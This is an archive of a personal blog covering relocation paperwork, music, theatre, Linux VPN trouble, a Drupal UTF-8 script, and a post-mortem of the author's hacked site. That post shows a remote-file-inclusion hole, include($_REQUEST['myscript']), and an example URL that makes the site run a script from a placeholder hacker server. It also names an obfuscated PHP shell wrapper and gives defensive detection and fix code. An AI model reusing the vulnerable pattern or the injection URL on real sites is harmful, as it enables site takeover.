Showing posts with label general. Show all posts

Thursday, December 24, 2009

The journey begins - Part II

The planning can be clubbed in three broad groups -

  1. Legal and Financial

  2. Possessions

  3. Relations


For Legal and Financial, the main thing was the immigration aspect. For us, it was securing some long-term Indian visa. For some of my friends who went back, the main issue was keeping the Green Card alive. Paramita and kids had PIO. I had a 6-month Indian multiple-entry visa that I obtained in haste in August. First thing was to apply for my OCI. Kudos to San Francisco Consulate, the process was very clean and streamlined. It took just 3 weeks to get the OCI in hand. Foolishly I didn't keep a copy of the application number. Otherwise, I could have kept track of the process in detail over the internet. I did that when I applied for OCI for Paramita and the kids. It also took 3 weeks. For them it was a change from PIO to OCI.

A few people have asked about the practical difference between PIO and OCI. It seems the biggest practical difference is that with OCI one doesn't need to go and register as a Foreign National every six months with the Indian Government (through outposts in most major cities).

The only complaint that I have against the OCI application process is that websites of different consulates as well as the website of the ministry have conflicting information. Some are up-to-date, but a lot are dated. Depending on which website you hit, your application process may be erroneous. Like in our case, the right amount of fee for changing PIO to OCI was misinformed. That took away some precious time and money.

After the visa, it was time to make sure we get paid in India and pay taxes. It was time for a PAN card. Permanent Account Number or PAN in India is equivalent to a Tax Identification Number or TIN in US.

The PAN application process is also quite streamlined, it seems. But for people residing outside India, like us, the main inconvenience is to obtain the attestation for the address-proof. Regular notarization doesn't work. One needs to go to the nearest Indian Consulate to get this attested. It may not be too much of a hassle if one has ample time in hand. But for our case, it was definitely a big inconvenience.

I found a service on the net, pancardnri.com. They actually run a few more websites with different domains essentially providing the same service through the parent company nriinvestindia.com. The extra service they provide is to get your address proof attested. The rest is basically creating a Demand Draft on your behalf, submitting the form and mailing you back the acknowledgment etc. The price seems to be steep for the work done, but basically you pay for the convenience. I availed their service and received my PAN card in mail within the promised time.

Tuesday, December 22, 2009

The journey begins

It all started on a March or April morning when I received a call from India. Will I be interested in applying for a position in MyCompany Bangalore? Of course, the name of the company is not MyCompany. But, that's besides the point here.

In last 4-5 years me and Paramita have explored the idea of going back to India in a semi-serious mode. That generally involved talking to people visiting US from India, especially my Brother-In-Law, who comes at least once a year in summer. That would be followed by some more phone calls to friends in India who had made the r2i journey at different times in past.

My position was that if I return, there is no point returning to any city other than Kolkata. But as time went by, I came down from that position since with the kind of career profiles we have, it's difficult to get the right kind of opportunity in Kolkata. There are very few product companies in Kolkata. We both have spent most of our working lives in product companies. If not Kolkata, Bangalore was the natural next choice.

When the call came I agreed to explore it with an open mind.

It was a long process. There were 4-5 telephone conversations (interviews). Then there was one in-person interview at MyCompany's local office. It was August by the time the in-person interview happened. My father suddenly passed away in August. I rushed back to India.

I came back with a  changed perspective. I was no more on an exploratory path. I was convinced that we should make the move. Now. MyCompany or not. My kids are 5 and 2. This is high time to make the move, if at all, for them too.

After I returned from India, me and Paramita had some deep discussions and decided we will try to make the move now. I won't say that Paramita was totally convinced, especially when approaching the issue from an emotional angle,  but she agreed to give it a serious try.

In early September, I started negotiating on the offer with MyCompany. Paramita started preparing her resume. We started thinking about the logistics. From that point onwards it became a hectic affair. I just joined a new company. Paramita had her fully-loaded job. Megh's school session had already started. We had to keep up our regular life and added this planning and execution, mostly planning at that stage, of R2I.

Sunday, March 29, 2009

Resume parsing score

I found this on Web. Being a programmer, I found it funny, but quite true.

 Resume Chart


[Source: http://www.hanovsolutions.com/resume_comic.png]

Thursday, March 26, 2009

Wordpress and Unicode

You type some non-English characters in the Wordpress or Drupal editor. You save, only to find those characters have become ????. If this describes your problem, then you have an issue with Unicode. You need to turn on Unicode support for Wordpress and Drupal. It will require some change of code. Basically, both Wordpress and Drupal support Unicode. However, by default, the databases are not configured to store Unicode characters.

Wordpress


For Wordpress, the modification is straightforward.

  1. Open up 'wp-config.php' from the root directory of your WordPress installation.

  2. Comment out the following two lines by adding '//' at the very beginning of each:
    define('DB_CHARSET', 'utf8');
    define('DB_COLLATE', '');


So that section should now look like this:
//define('DB_CHARSET', 'utf8');
//define('DB_COLLATE', '');

[Source: http://hansengel.wordpress.com/2007/10/09/wordpress-unicode-and-s/]

Drupal


For Drupal, the change is a bit more involved:

  1. Go to the root directory of your Drupal installation.

  2. Save the following code in a file named collate_db.php:

    <?php
    # Do not change anything below this ( :-) <- Rewrite Editor's note.)
    require_once("includes/bootstrap.inc");
    require_once("includes/database.inc");
    require_once("includes/database.mysql.inc");
    $connect_url = 'mysql://user:pwd@server/database';
    $active_db = db_connect($connect_url);

    # List every table in the database
    $sql = 'SHOW TABLES';
    if ( !( $result = db_query( $sql ) ) ) {
        echo '<span>Get SHOW TABLE - SQL Error<br>' . "</span>\n";
        exit;
    }

    # Loop through all tables in this database
    while ( $tables = db_fetch_array($result) ) {
        # Each row is an associative array with one entry: the table name
        $table = $tables[key($tables)];

        if ( !( $result2 = db_query("ALTER TABLE %s COLLATE utf8_general_ci", $table) ) ) {
            echo '<span>UTF SET - SQL Error: <br>' . "</span>\n";
            break;
        }

        print "$table changed to UTF-8 successfully.<br>\n";

        # Now loop through all the fields within this table
        if ( !( $result2 = db_query("SHOW COLUMNS FROM %s", $table) ) ) {
            echo '<span>Get Table Columns Query - SQL Error: <br>' . "</span>\n";
            break;
        }

        while ( $column = db_fetch_array( $result2 ) ) {
            $field_name = $column['Field'];
            $field_type = $column['Type'];

            # Change text based fields only
            $text_field_types = array('char', 'text', 'enum', 'set');

            foreach ( $text_field_types as $type ) {
                if ( strpos($field_type, $type) !== false ) {
                    # CHANGE redefines the column, so attributes not repeated
                    # here (NOT NULL, DEFAULT) are not carried over
                    $sql4 = "ALTER TABLE $table CHANGE `$field_name` `$field_name` $field_type CHARACTER SET utf8 COLLATE utf8_bin";
                    if ( db_query($sql4) ) {
                        echo "---- $field_name changed to UTF-8 successfully.<br>\n";
                    } else {
                        echo "---- $field_name - SQL Error<br>\n";
                    }
                    # One ALTER per column, even if several type names match
                    break;
                }
            }
        }
        echo "<hr>\n";
    }
    ?>

  3. Look at the line in red in the code (5th line), the one that sets $connect_url. You have to replace that part with your installation-specific information.

  4. Open the file sites/default/settings.php under the same Drupal root directory. Copy the rest of the line of
    $db_url =

    and paste it after
    $connect_url =

    in the above code.

  5. Save collate_db.php

  6. Open a browser window and request the collate_db.php from your browser.

  7. If everything is fine you would see something similar to this:
    access changed to UTF-8 successfully.
    ---- mask changed to UTF-8 successfully.
    ---- type changed to UTF-8 successfully.

    <--- Lines not shown --->

    watchdog changed to UTF-8 successfully.
    ---- type changed to UTF-8 successfully.
    ---- message changed to UTF-8 successfully.
    ---- variables changed to UTF-8 successfully.
    ---- link changed to UTF-8 successfully.
    ---- location changed to UTF-8 successfully.
    ---- referer changed to UTF-8 successfully.
    ---- hostname changed to UTF-8 successfully.


  8. Delete collate_db.php for security.


You are done.

[Source: http://www.urbannatives.net/localtreechild/..._ci_and_tabl ]

Thursday, March 12, 2009

Baul

I cannot claim myself to be any expert on Baul songs. I have heard my share of Baul songs, mostly from radio. However, I have been fortunate to have two coincidences working for me in this respect. First, I like writings of Sudhir Chakrabarti. He was a professor of Bengali, but his passion was Bangla songs. Though he started writing rather late, he has been relentless in churning out articles since he started writing popular articles with seriousness. These articles are not just nonsensical pot-boilers. There are goods and bads, but none is insignificant. Sudhirbabu's other passion is Bengali Folk culture. I think I have painted the description of the passion with too broad a brush, but could not find a better description than this. He doesn't do it as a paid occupation. It's his labor of love. I don't know whether he follows the right research methodologies or not. But I could not care less. His research produced books like ব্রাত্য-লোকায়ত লালন (Bratyo Lokayoto Lalon), বাউল ফকির কথা (Baul Phakir Katha). Through these books and other writings of Sudhirbabu I got interested in the Baul way of life, and especially the Baul songs, though I learned that Baul songs are part of the Baul way of life. Without understanding or experiencing the Baul way of life one can neither appreciate nor fathom the Baul songs.

My other, and possibly bigger, influence for Baul songs is my friend Sudipto Chatterjee. Sudipto teaches and works in theater and performance studies. But he picked up a penchant for Lalon Shah pretty early on. I remember the day when I first met him, about fifteen years ago, he boasted that he had already collected all Lalon songs. Only later I could understand his pride in that possession. He (and Theater director Sumon Mukhopadhyay) travelled to Kushthita, Lalon's birth and workplace, in Bangladesh in 1997. The materials they collected there, and since then, finally bore fruit in the form of a Performance called "The Man Of The Heart". A performance on Lalon's life and work, written and performed by Sudipto and directed by Sumon. I have heard numerous Lalon songs from Sudipto, along with stories, anecdotes and explanations. I heard about Panju Shah, Duddu Shah first through him. These, Sudhirbabu's books, gave me a better idea about the journey of Baul culture through history, both social and political. In most cases, these two were intermingled intimately.

Later, through a Bangla folk band called দোহার (Dohar), I first heard Abdul Karim's song. And I was bowled over immediately. Later I tried to dig up information from the web about Abdul Karim, who uses Baul Abdul Karim as his bhonita in some songs. There is not a lot of information about him on the web, at least not as much to satisfy my curiosity. However, I came to know that he is still alive and well, though he is over 90 years of age. He still writes songs. But he has already become an institution in Bangladesh. I could not figure out whether he leads a strict Baul life. But that does not matter to me at this point. You can check out some of his songs in Youtube by searching on his name.

Wednesday, February 04, 2009

Ain’t No Luddite

I am not an adopter. I don't work to stay ahead of the technology curve. Rather, I fall quite far back in that curve to see all my friends and most of my family and acquaintances pass by me and my wife. But the truth is that I am quite happy and content being a follower. I keep my OS at least one version behind the latest and the greatest. Currently, even though my sparingly-used Windows machine runs XP (used only for music production since I have already invested money and learning-time on software that runs only on Windows), I have the latest OS version (Ubuntu Intrepid Ibex 8.10) on my primary home machine. I resisted having a cell phone for quite some time before finally jumping on the bandwagon in 2003. Even then I have a pretty basic cell phone which is used as a - surprise! surprise! - phone to call people. No blackberry, no iPhone, no Android, no nothing. We don't have an LCD or Plasma TV, mostly because we don't need it. We don't watch TV or movies that much. 90% of time, our TV is playing either Baby Einstein DVD or PBS Kids show. Our DVD player is a $25 Coby. My home theater is an 8-year-old system. My Bose Acoustimass speakers are sitting comfortably in the closet, gathering dust. Five-and-half-years since we have moved into this house, I didn't get energy, urge or serious nudge from Paramita to hook those on. On the social networking side, I have got onto Orkut after having a dormant account for quite a while, thanks to Paramita for finally making me active there. But that's been almost one-and-half years. By that time most of my friends there have moved on to the greener pasture of Facebook. I have too. But only recently. And I am still trying to figure things out there. Now I see people are using Twitter. I guess, it will take me at least a year or two before I get on to Twitter.

The reason I started this post is, I think the best thing that has happened in last two years on the Technology side, as far as I am concerned, is Pandora. It's really awesome. Those who haven't yet found Pandora: it's a Music Genome Project. The site says:
Together we set out to capture the essence of music at the most fundamental level. We ended up assembling literally hundreds of musical attributes or "genes" into a very large Music Genome. Taken together these genes capture the unique and magical musical identity of a song - everything from melody, harmony and rhythm, to instrumentation, orchestration, arrangement, lyrics, and of course the rich world of singing and vocal harmony. It's not about what a band looks like, or what genre they supposedly belong to, or about who buys their records - it's about what each individual song sounds like.

So the idea is that you start with one of your favorite songs. Then based on the musical attributes of the song, Pandora will select other songs. For each song, you can tell Pandora whether you like this song or not, thereby 'training' Pandora to your taste. You can create 'Radio Stations' based upon this song. A 'Radio Station' can be created by Artist or by Genre too. There is a cool feature called Quick Mix, which is basically a random play of songs from Station you have selected.

It's really easier to experience and experiment with Pandora than explain how it works. You need a registration for creating Stations. But registration is free and requires very little information. However, there is one caveat. The service is only for North American audience. I understand that is due to some licensing issue. If you are in North America (or have a North American IP address ... wink wink), go there and have some wonderful musical experience.

Monday, February 02, 2009

Wednesday, January 07, 2009

Don’t Read This …

... instead, read Robert Fisk in The Independent - Why do they hate the West so much, we will ask. What I wanted to say and could not, is there.

...

As we are entering into the new year, the news and life is bleak all around. This is particularly true for the people in Gaza. They are a hapless victim of a lethal pounding from Israel. What Israel is doing in the name of 'self-defence' is totally and absolutely unacceptable to any person of rationality and conscience. This is not to condone the behavior of Hamas, but a much bigger blame must be affixed to Israel. But I guess this is somewhat expected from an aggressor and occupier like Israel.

What is more unacceptable to me is US foreign policy towards Israel and Palestine. In 2008 Israel was the recipient of the biggest chunk of US aid. 2.4 Billion. "Virtually all of this money is used to buy weapons (up to 75% made in the U.S.). Beginning in 2009, the U.S. plans to give $30 billion over 10 years." (Source: Parade magazine) I have tried to figure out the reason for this uncritical and total support of Israel from US, especially if we remember the English statesman Lord Palmerston's aphorism that "Nations have no permanent friends or allies, they only have permanent interests." It is true that US has to have a strong ally in that region. Its strategic importance is too high to ignore for US. Israel fulfills that requirement. However, it has also become quite clear that the blind support of Israel and its aggression has given rise to a deep hatred towards US. Not only in that region alone, but all around, especially with such a blatant nonchalance from Israel's part when more than a quarter of the victims are civilians, mostly children. Israel-Palestine issue has become a very potent tool for separatists and terrorists to recruit and deploy youths all around the globe - be it Middle East, Afghanistan, Iraq, Pakistan or Kashmir. In the final tally, a blind support of Israel's aggression returns a negative balance to USA's foreign policy balance sheet. I guess, US can still support Israel and its existence and still maintain some semblance of balance. It may not be an easy task. But the diplomats and the elected officials are not selected or elected to do easy tasks.

Monday, January 05, 2009

Fast food for thought

I just rebooted my office machine running CentOS 4.6, which is based on Red Hat Enterprise distribution. It was running for 121 days, i.e almost 4 months!!

Ubuntu Intrepid and vpnc

My company has a decent work-from-home policy. Every Thursday we can work from home. And most do, including myself. In addition to the regular Thursdays, we work from home whenever there are project deadlines - which is almost always. Hence, to have a solid VPN connection is a must for me.

My last non-Ubuntu desktop was Fedora. I compiled the Cisco vpnclient and used it without a problem. When I switched to Ubuntu Edgy (6.10) I started using the open source vpnc which worked quite nicely. The upgrade to Feisty (7.04) and Gutsy (7.10) worked fine too. But from Hardy (8.04) the problem of dead-peer-detection raised its ugly head. There were patches available, but that didn't solve the problem for me. I was looking forward to the Intrepid (8.10) release hoping that the vpnc issue will be resolved for good. After Intrepid was released there were contradictory reports about whether the dead-peer-detection issue has been resolved. I decided to test it out myself. So I upgraded to Intrepid.

vpnc can be used from command line, or else one can install the vpnc plugin for the network-manager (nm) and control the vpnc connection from the network-manager applet. Until now, I have only used the command-line. But this time I have tried both for testing. This is what I have found:

  • The dead-peer-detection issue is solved both in the command-line client as well as network-manager plugin when you pass the dead-peer-detection interval value 0 to the command-line program or check a box in the network-manager plugin.

  • network-manager plugin has a bug that overwrites the resolv.conf when the VPN is disconnected. I am forgetting what exactly is the nature of the bug, but basically it didn't revert back to the original resolv.conf after VPN session ended. The bug may only be for the static IPs.

  • Even if the dead-peer-detection issue was resolved, my VPN connection would just stall for a minute or two before continuing after I have typed about 10-15 characters in my SSH window. And this repeats over and over again. Googling the problem suggests something to do with routing table and/or DNS lookup. I tried different things for a while but none could resolve this issue.


At last I gave up and went back to the proprietary cisco vpnclient. I compiled and installed it following this post. Since then I am having a smooth VPN ride. I would love to go back to the open source vpnc client, but not at the expense of stability of connection. I need to earn my bread.

Tuesday, June 24, 2008

The new voice of our time

A couple of weeks back our local cultural association Sanskriti organized its fourth Natyomela - a Theater festival. Our group ENAD could not participate in the festival this time. However, this year Sanskriti introduced a slot for an "outside" group. That outside group was ECTA from New Jersey. They brought a new play Taconic Parkway, written and directed by Sudipta Bhowmik.

Sudipta Bhowmik was somewhat known to the bay-area theater aficionados. He is operating in Bengali theater scene in north America for a while now. He is quite well-known especially in the east-coast circuit. For some reason, he never got a chance to bring his play to the west coast before. We, at EAND, were happy to do Ron - our last production - which was his play. I think that was the first exposure people got to Sudipta Bhowmik's work here in the bay area.

This time he also directed his three-cast play Taconic Parkway. It's a very powerful play. It may not put you in an internal conflict that Ron might have, but this play may well put you in a spell. He has masterfully woven an unusual story in a non-histrionic way. (That is, if you take the negative connotation of histrionics.) I will go out on a limb and say that Sudipta Bhowmik is producing some of the most powerful and important Bengali plays of our time. That includes Kolkata and West Bengal. (I am not very conversant with Dhaka's, or Bangladesh as a whole, contemporary plays, mostly due to accessibility problem.) More importantly, he is providing a glimpse to the actual USA-residing Bengalees. This is not the picture you get in mainstream magazines and mundane media portrayal.

Someday, I hope to write a more studied observation of his plays through more minute reading, but as a somewhat informed audience I can only appreciate his work. He is definitely blessed with some very competent actors. I am sure that helps him not only to mount a good play as a director, but also as a playwright since he can experiment with his characters. But still, the bottom line remains that he is writing some worthwhile plays of our time.

Thank you Sudiptada. Thank you for the plays.

Sunday, May 25, 2008

Tin Pahaarer Gaan

I came across Birendra Chattopadhyay's work when, I believe, I was in high school or in first year of college. My impressionable mind immediately fell in love with his work. He was never a mainstream poet. But his poetry bore a unique and strong voice which I seldom found in others. Around the same time I found a cassette published by School of People's Art which contained songs and recitation of Birendra Chattopadhyay's poems. The songs were created out of his poems by Binoy Chakrabarty. He did an excellent job. Together with the poems and this cassette, Birendra Chattopadhyay made a lasting impression.





I loved a long poem called 'Tin Pahaarer Gaan', literally "The song of Three Mountains" or "The song of a mountain called Tin Pahaar". It starts with 'Pahariya madhupur metho dhulipoth' and continues to give a vivid and wonderful imagery. Around that time I also started composing songs. So I put tune to it - not to the whole poem though. I stopped when I thought was the right moment for a song to stop. This was 1988-89. I kept it to myself and never published it. In 2007 I arranged it. This is that song.

Sunday, May 11, 2008

Portrait of a hack

It's been a long time since I updated the page. Again. As I was intending to update the page with the report of my latest endeavor, something unexpected happened.

Last Sunday morning, I woke up to receive a terse mail from my hosting company - Host Monster - that my basus.net account had been deactivated due to "terms of service violation". So I called them. The Tech support guy confirmed that the account had really been deactivated because there is a phishing page lurking inside my site. He suggested that I talk to their Abuse department. Even though it was a Sunday, there was somebody in Abuse department I could talk to. She pointed me to a directory called 1/ inside my webroot folder. That, and few other files, seems to be gratuitous contributions of the hackers. She said once I removed the offending pages and they confirmed that I did, they could reactivate the account. I got off the phone and the first thing I did was to remove the 1/ directory. Looking back, I think, that was a knee-jerk reaction. I could have avoided that. I, then, moved my original webroot folder and put up a placeholder page instead. After these minor surgeries I called my hosting company's abuse department. She looked at the directory to confirm that the offending pages are really gone. Once confirmed she immediately reactivated my account. I briefly chatted with her about the possible backdoor and inquired if they had any tool to sniff backdoor. They don't have any tool but she gave me pointers to some usual suspect applications. Fortunately I didn't have any such application. However, that's unfortunate too, since now I have to hunt the backdoor myself manually. It also means that the backdoor is possibly an inadvertent creation of my sloppy coding. Tooo baad.

But one thing I want to mention here, I found my hosting company's support impeccable. They were helpful, to-the-point and not too finicky. Deactivating my site showed they had a good policy in place against questionable content. Kudos.

Once my mail server etc. are back online and offending material offline, I had a few tasks at hand. In order of priority, they were:

  1. Remove all injected files and content

  2. Find and fix backdoor

  3. Put site back online


So, here are some interesting things I have found on the way. These must have been well-documented in some security website. But, here is what I have found.

Modus Operandi: Once the hackers find a backdoor, they push a file through the backdoor. This file then becomes the hacker's gateway. They come and go through this door at will. They can pretty much see what's there inside, put files (scripts) there and sometimes hijack the site.

File Extension: Some of the initial files that the hackers upload had .jpg extensions but they are actually PHP scripts. For example, php3.jpg, lila.jpg or sh6.jpg. I think, they want the site owner to overlook any .jpg file thinking they are image files hence harmless. PHP engine, though, is not fooled by the extension. It will execute a file with any extension as long as it is valid PHP code.

Offending files: The most interesting is php3.jpg. It looks like a binary file

 <? eval(gzinflate(base64_decode('


However, if you look closely, you will notice that it starts with "<? eval(gzinflate(base64_decode('". This basically tells the PHP engine to inflate the gzipped and base64 encoded content that follows. When I exploded it, it became an HTML page which looks like this in a browser:

PHP Shell Screenshot

Backdoor: There were a couple of backdoors in my site (at least the ones that I have found). All of them are similar.

PHP script can run another script by calling a function named include(). Suppose you have a script named foo.php and another named bar.php. In foo.php you may have a call like:
include('bar.php');

Now if you request foo.php from a browser, it will also execute bar.php, even though bar.php was not explicitly called or requested.

Now the bar.php does not need to reside on the same directory or even the same file system. bar.php may be sitting on a different webserver, 10000 miles away, reachable via a HTTP call - http://bar.com/bar.php. Now, still foo.php can execute bar.php via http. Your include will simply say,
include('http://bar.com/bar.php');

PHP will take care of opening a socket to the bar.com server, create a HTTP request to bar.php and execute its content after receiving the HTTP response.

Now, suppose, instead of hard-coded http://bar.com/bar.php as the argument of the include() call, you pass a request parameter - something that you got via a POST or a query-string.
$myscript = $_REQUEST['myscript'];
include($myscript);

Now, you have a backdoor. How so? If a malicious hacker knows about these two lines, she can make a request to foo.php like this
http://<servername>/foo.php?myscript=http://<hackersserver>/malicious_script.php

foo.php will obediently execute whatever malicious_script.php asks it to do. Now the question is how the hackers know of those two lines of code. By looking at other links on your site (or other sites which link to your site) and guessing. This is not difficult.

I precisely had this backdoor. Three of them. I think hackers exploited two out of three. I have fixed the code, or I think I have until hackers expose another backdoor. I have also written a couple of monitoring and reporting scripts which will periodically look for any change in my site. Let's see what happens.
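One way to close the include() backdoor described above, as an added example and not the fix actually applied on this site: the request parameter only selects a key in a fixed table and never reaches include() as a path or URL. The function name resolve_page(), the page keys and the pages directory are assumptions made for the illustration.

```php
<?php
// Added example, not code from this site. resolve_page(), the page keys and
// the pages directory are hypothetical names.
//
// Vulnerable pattern from the post, for comparison:
//     $myscript = $_REQUEST['myscript'];
//     include($myscript);

/**
 * Map a user-supplied key to a file under $base_dir, or return null.
 * The request never supplies a path or URL, only a key into a fixed table.
 */
function resolve_page($key, $base_dir)
{
    $allowed = array(
        'home'    => 'home.php',
        'music'   => 'music.php',
        'contact' => 'contact.php',
    );
    // Arrays (?myscript[]=x) and unknown keys are rejected outright.
    if (!is_string($key) || !isset($allowed[$key])) {
        return null;
    }
    // Second check: the resolved file must exist and sit inside $base_dir.
    $base = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . $allowed[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary pages directory and a few request values.
$pages = sys_get_temp_dir() . '/pages_demo_' . uniqid();
mkdir($pages, 0700, true);
file_put_contents($pages . '/music.php', "<?php echo 'music page';\n");

$requests = array(
    'music',                    // known key, file exists
    'home',                     // known key, but no such file on disk
    'music.php',                // a file name instead of a key
    'http://bar.com/bar.php',   // the remote include from the post
    array('music'),             // parameter sent as an array
);
foreach ($requests as $value) {
    $target = resolve_page($value, $pages);
    $shown  = is_array($value) ? '(array)' : $value;
    echo str_pad($shown, 26), $target === null ? 'rejected' : 'include ' . basename($target), "\n";
}

// In foo.php the call site becomes:
//     $key    = isset($_GET['myscript']) ? $_GET['myscript'] : '';
//     $target = resolve_page($key, __DIR__ . '/pages');
//     if ($target === null) { header('HTTP/1.0 404 Not Found'); exit; }
//     include $target;

unlink($pages . '/music.php');
rmdir($pages);
```

Independently of the code fix, setting allow_url_include = Off in php.ini (the default since PHP 5.2) stops include() from fetching http:// URLs at all.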

On a subsequent post, I will try to write more about the files the hackers put.

Update: I never got a chance to write more about the files the hackers uploaded. However, another thing of importance here. The hackers modified my root .htaccess file. That's the configuration file for Apache web server and it affects the tree underneath, unless overwritten by another local .htaccess file. They put a Rewrite rule in the .htaccess. Apache rewrite rule basically can modify a request line. For example, a browser may request for a file called "foo.html". Via Rewrite rule, you can serve some other file, say "whatever.html". Since, this happens without browser's knowledge, browser still thinks that it got the requested foo.html file. That's exactly what happened in my case. The hackers wrote a rewrite rule in such a way that if a request came through a search result (identified by the Referer header), it shows some Viagra ad page that they uploaded. And be careful, they bury the Rewrite rule in .htaccess file after a bunch of blank lines, so that when you open the file in an editor, you won't see it without scrolling down. Very clever.
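The three traces described in this post (PHP hidden behind a .jpg extension, the eval(gzinflate(base64_decode( wrapper, and a Referer-based Rewrite rule buried under blank lines in .htaccess) can be checked for mechanically. The script below is an added example, not the author's monitoring scripts; the function names, the blank-line threshold and the sample files it creates in a temp directory are all constructed for the illustration.

```php
<?php
// Added example, not the author's monitoring scripts; all names are hypothetical.
// Image extensions and the bytes a genuine file of that type starts with.
$IMAGE_MAGIC = array(
    'jpg'  => "\xFF\xD8\xFF",
    'jpeg' => "\xFF\xD8\xFF",
    'png'  => "\x89PNG",
    'gif'  => "GIF8",
);

/** Return the reasons a file looks suspicious (empty array = nothing found). */
function audit_file($path, $image_magic)
{
    $data = file_get_contents($path);
    if ($data === false) {
        return array('unreadable');
    }
    $reasons = array();
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    if (isset($image_magic[$ext])) {
        if (strncmp($data, $image_magic[$ext], strlen($image_magic[$ext])) !== 0) {
            $reasons[] = 'image extension but no image header';
        }
        // Binary data can contain "<?" by chance, so treat this as a lead.
        if (preg_match('/<\?(php|=|\s)/i', $data)) {
            $reasons[] = 'PHP open tag inside image file';
        }
    }
    // The decode-and-eval wrapper described in the post, in any file type.
    if (preg_match('/eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(/i', $data)) {
        $reasons[] = 'eval(gzinflate(base64_decode( wrapper';
    }
    return $reasons;
}

/** List rewrite directives in .htaccess text, noting ones pushed below blank lines. */
function audit_htaccess($text, $blank_run = 5)
{
    $findings = array();
    $run = 0;       // length of the current run of blank lines
    $longest = 0;   // longest run seen above the current line
    foreach (preg_split('/\r\n|\r|\n/', $text) as $i => $line) {
        if (trim($line) === '') {
            $run++;
            $longest = max($longest, $run);
            continue;
        }
        $run = 0;
        if (!preg_match('/^\s*Rewrite(Cond|Rule)\b/i', $line)) {
            continue;
        }
        $note = 'line ' . ($i + 1) . ': ' . trim($line);
        if ($longest >= $blank_run) {
            $note .= ' [below a run of ' . $longest . ' blank lines]';
        }
        if (stripos($line, 'HTTP_REFERER') !== false) {
            $note .= ' [keys on the Referer header]';
        }
        $findings[] = $note;
    }
    return $findings;
}

/** Walk a webroot and return array(path => reasons) for every flagged file. */
function audit_tree($root, $image_magic)
{
    $report = array();
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path = $file->getPathname();
        $reasons = audit_file($path, $image_magic);
        if ($file->getFilename() === '.htaccess') {
            $reasons = array_merge($reasons, audit_htaccess(file_get_contents($path)));
        }
        if ($reasons) {
            $report[$path] = $reasons;
        }
    }
    ksort($report);
    return $report;
}

// Constructed sample webroot in a temp directory; nothing here is executed.
$root = sys_get_temp_dir() . '/audit_demo_' . uniqid();
mkdir($root . '/1', 0700, true);
file_put_contents($root . '/photo.jpg', "\xFF\xD8\xFF\xE0" . str_repeat("\x00", 32));
file_put_contents($root . '/1/sh6.jpg', "<? eval(gzinflate(base64_decode('PLACEHOLDER')));");
file_put_contents($root . '/.htaccess', "Options -Indexes\n" . str_repeat("\n", 40)
    . "RewriteEngine On\nRewriteCond %{HTTP_REFERER} search\\.example [NC]\n"
    . "RewriteRule .* /1/ad.html [L]\n");

foreach (audit_tree($root, $IMAGE_MAGIC) as $path => $reasons) {
    echo substr($path, strlen($root)), "\n    - ", implode("\n    - ", $reasons), "\n";
}
```

Every Rewrite directive is listed, legitimate ones included, so the output is meant to be compared against what the site owner knows they put in .htaccess.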

Tuesday, January 29, 2008

Song puzzles

I have some old recordings in my possession. Old means really old - at least fifty years or more. I have a cousin, who is a professional Audio Engineer with a big studio in India. But his passion is music from a very very tender age. As they say, he lives for music. When he was a student, he used to roam around in Kolkata to collect old records. I guess these recordings came from those ventures. These are recorded from noisy 78 RPM disks. I haven't tried to clean up the recordings. I have noticed in my earlier attempts of cleaning that unless one has lots of time and really good tools, it's better to leave the noise. Incompetent noise-reduction kills the song more than the noise does.

Move over to my Music Broadcast page and listen to the Recognize the singers section. If you can recognize them before I publish the name, drop me a line.

Monday, December 31, 2007

What is a great art?

I have found that my idea of art and its impact on the audience has changed over time. I understand, this is quite natural and most everybody else also experiences this changing attitude towards art and its effect over time. It's just the other side of the fact that I get moved differently every time I read, say, the play Daakghar (The Post Office).

Art, no matter what form, needs to move its target audience emotionally. We - this term may need some elaboration, but please take it on the face value for now - tend to over-analyze art. I even feel that sometimes we go to some concert or play or read some book just to analyze and critique the art. And in the process we forget to enjoy it. Maybe, on a subconscious level, we are thinking, "I may not be an artist but I am a critic who can analyze and tear apart any artist's work - main hoon baap kaa baap".

What I said above is not directed to anybody in particular but me. A few months back I realized this sad fact that the gratuitous critic in me is coming in the way of my enjoyment and the art. My training and knowledge in some form of art, namely music and drama, is not helping me either. During an intense dramatic moment of a play, part of my mind is analyzing the blocking, the lights, the actors' business and so on. While listening to a new song, my mind gets unnecessarily concentrated on the arrangement of the song, the chord progression, the crispness of the recording. In the process the dramatic moment and the song is gone, probably forever. The first experience never comes back.

I am actively trying to correct it since I found this lacking of mine. And trust me, it's not easy. Apart from untraining and retraining my senses and mind, there are some more philosophical dilemmas to sort out. The biggest of them is, "Just because an art moves me emotionally, should I call it a great piece of art?" I tend to answer a subjective "yes" though I am fully aware that some second rate tearjerkers can and do move me emotionally quite often. And of course there is the other side too, where a piece, which is considered great art by many, failed to impress me at all. However, I rationalize that by accepting that it may be a result of my improper training.

The bottom line of art appreciation is training. Most of us are self-trained in art appreciation and most of us are smart enough to separate wheat from chaff. The problem is with the borderline stuff - the stuff that cannot be called great at the first experience nor can be pushed aside as crap. A great art will move you emotionally as well as give you enough food for thought that you ruminate for a few days, if not weeks. A crap art will give you neither. The borderline case will give you some. Unfortunately, the world of art is full of these borderline cases. And the fact that it is majority in the world of art forces us to bring out the critic from inside us more often than it forces us to just sit back and enjoy. That's a sad fact of thinking life.

Monday, December 17, 2007

After a hiatus

I just finished directing a play by Sudipta Bhawmik called Ron. It's a very relevant story of our time waiting to be told. Sudiptada has woven a magic spell of contemporary tale on an age-old philosophical conflict between the need to fight some wars and the principled position of anti-war. This not only looks at the current time, it does so from the first generation and second generation immigrants' perspective.

After the play there was a short Q&A session with the playwright where he said that the play is definitely anti-war. But I am positive nobody can call it propagandist. I actually found it to be well-balanced and portrays the viewpoint of a soldier and his family's perspective in a very touching way.

